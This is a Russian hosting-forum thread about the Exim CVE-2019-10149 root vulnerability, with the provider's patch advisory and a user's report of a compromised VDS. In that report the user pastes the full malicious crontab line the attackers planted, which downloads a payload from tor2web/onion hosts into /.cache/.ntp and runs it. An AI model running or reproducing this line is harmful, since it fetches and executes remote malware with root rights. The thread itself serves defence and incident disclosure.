ihor.ru: VDS от 100 р., Серверы, Хостинг, Коло, Стойки в Москве / 9

P1
На сайте с 23.04.2016
Offline
26
#71

Здравствуйте. Что у Вас там опять происходит? Все сайты лежат?

nikita_s
На сайте с 12.10.2018
Offline
31
#72

Coolmax, здравствуйте, благодарим вас за обращение, глобальных сбоев с ipv6 не было, судя по информации в тикете, причина была в настройках, поправили, теперь тенденция не должна более повторяться :)

partos_1, Здравствуйте, сбоев не наблюдалось, советуем обратиться в техническую поддержку для того, чтобы установить причину проблемы и устранить её.

nikita_s
На сайте с 12.10.2018
Offline
31
#73

Выявлена критическая уязвимость в почтовом сервере Exim, которая позволяет выполнить код на сервере с правами root.

Данная уязвимость (CVE-2019-10149) может привести к выполнению кода на сервере с правами root, который осуществляется во время обработки специального запроса. Эксплуатация данной угрозы возможна в версиях с 4.87 по 4.91 включительно или при сборке с опцией EXPERIMENTAL_EVENT.

Для исправления прошлых версий, применяющихся в дистрибутивах, можно использовать патч, доступный по ссылке: https://git.exim.org/exim.git/commit/d740d2111f189760593a303124ff6b9b1f83453d

Обновления для пакетов, поставляющих версию 4.92, в которой не проявляется данная проблема, можно найти по ссылкам:

Для Debian: https://security-tracker.debian.org/tracker/CVE-2019-10149

Для Ubuntu: https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-10149.html

Для OpenSUSE: https://bugzilla.novell.com/show_bug.cgi?id=CVE-2019-10149

Для Arch Linux: https://www.archlinux.org/packages/community/x86_64/exim/

Для Fedora: https://bodhi.fedoraproject.org/updates/FEDORA-2019-7b741dcaa4

Данный почтовый сервер является самым распространённым, поэтому, скорее всего, он установлен в вашей системе. На данный момент уже появились вирусы, которые эксплуатируют уязвимость. Советуем осуществить проверку на наличие Exim, а также принять меры по защите от данной уязвимости.

Подробнее об особенностях и принципе действия уязвимости можно прочитать по ссылке: http://www.opennet.ru/opennews/art.shtml?num=50819

jpg 184409.jpg
Coolmax
На сайте с 02.03.2008
Offline
132
#74

Что примечательно, после обращения в ТП, похерился весь мой crontab осталось только это:

*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /.cache/.ntp) && chmod +x /.cache/.ntp && /bin/sh /.cache/.ntp

Я ни на что не намекаю. Но это странно. Второй мой vds пока не словил такой проблемы.

Exim4 я уже обновил. Как мне убедиться, что заразы внутри не осталось?

[Удален]
#75

Coolmax, это не поддержка. Это массовые взломы Linux через уязвимость в Exim.

Срочно лечить и обновлять!

---------- Добавлено 10.06.2019 в 20:20 ----------

Если уязвимость осталась то крон будет перезаписываться регулярно.

nikita_s
На сайте с 12.10.2018
Offline
31
#76

Coolmax, если vds уже заражён, одного обновления будет недостаточно, вирус довольно неприятный, поэтому нужно провести процедуру его полного устранения, наши специалисты оказывают данную услугу в рамках платного администрирования. Вы можете обратиться в техническую поддержку, чтобы воспользоваться данной опцией и устранить вирус.

Lanathel
На сайте с 05.10.2016
Offline
33
#77

Забавно получить рассылку, даже если на VDSах не стоит никакого MTA (msmtp не в счет, ибо он не является "полноценным" MTA)

С другой стороны, RCE от root'a в *nix не было уже очень давно и желание хостера не разводить в своем парке рассадник зараженных серверов вполне понятно :)

nikita_s
На сайте с 12.10.2018
Offline
31
#78

Lanathel, решили распространить информацию об этой уязвимости как можно шире, предупреждён - значит вооружён :)

I7
На сайте с 12.06.2008
Offline
374
#79
Lanathel:
Забавно получить рассылку, даже если на VDSах не стоит никакого MTA

Как предлагаете определять? Сканировать сотни IP на наличие на одном из портов Exim? Это же очень ресурсозатратно и лишено смысла. Лучше предупредить. Нет Exim на серверах в IHOR? Так может есть на другом, хостер которого не посчитал нужным предупреждать.

XLhost.Ru
На сайте с 09.09.2008
Offline
231
#80

Xrumchenko, путь к стилям в шаблоне не http?

Windows / Linux VPS на NVMe от $10 | Dedicated от $60 ( https://xlho.st )

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий